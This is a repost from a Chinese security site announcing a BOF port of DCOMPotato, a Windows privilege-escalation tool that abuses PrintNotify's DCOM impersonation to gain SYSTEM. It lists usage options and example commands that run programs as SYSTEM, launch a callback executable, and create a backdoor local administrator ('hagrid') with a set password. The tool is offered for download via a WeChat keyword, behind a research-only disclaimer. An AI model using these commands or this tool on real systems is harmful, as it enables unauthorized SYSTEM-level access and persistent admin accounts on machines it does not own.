DCOMPotato bof实现

admin 2023年6月5日15:15:06评论48 views字数 917阅读3分3秒阅读模式

声明公众分享安全工具项目来自互联网仅提供安全研究学习使用用于其他目的使用者需要承包所有法律责任相关连带责任公众工具作者无关声明

项目介绍

DCOMPotato的 BOF 版本。SeImpersonate通过将恶意IUnknwon对象传递给 PrintNotify 的 DCOM 调用来获得具有特权的 SYSTEM 特权。

默认情况下,以 SYSTEM 身份运行的 PrintNotify 服务的ImpersonationLevel设置为RPC_C_IMP_LEVEL_IMPERSONATE

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvchostprint

使用方法

--pprog : program to launch. Default cmd.exe
--pargs : command line argument to pass to program. Default NULL
--pmode : create process call. 1 for CreateProcessWithTokenW. 2 for CreateProcessAsUser. 3 for NetUserAdd. Default 1

执行命令CreateProcessWithTokenW

DCOMPotato --pargs /c whoami /all > C:tempwhoami.txt

执行命令CreateProcessAsUser

DCOMPotato --pargs /c net user hagrid P@ssw0rd /add --pmode 2

执行程序 CreateProcessWithTokenW

DCOMPotato --pprog C:tempcallback.exe

使用 NetUserAdd 创建本地管理员帐号 (hagridP@ss@29hagr!d)

DCOMPotato --pmode 3

下载地址

点击下方名称进入公众 

回复关键字230605获取下载链接


vx


DCOMPotato bof实现

原文始发于微信公众号(红蓝公鸡队):DCOMPotato bof实现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月5日15:15:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DCOMPotato bof实现https://cn-sec.com/archives/1783596.html

发表评论

匿名网友 填写信息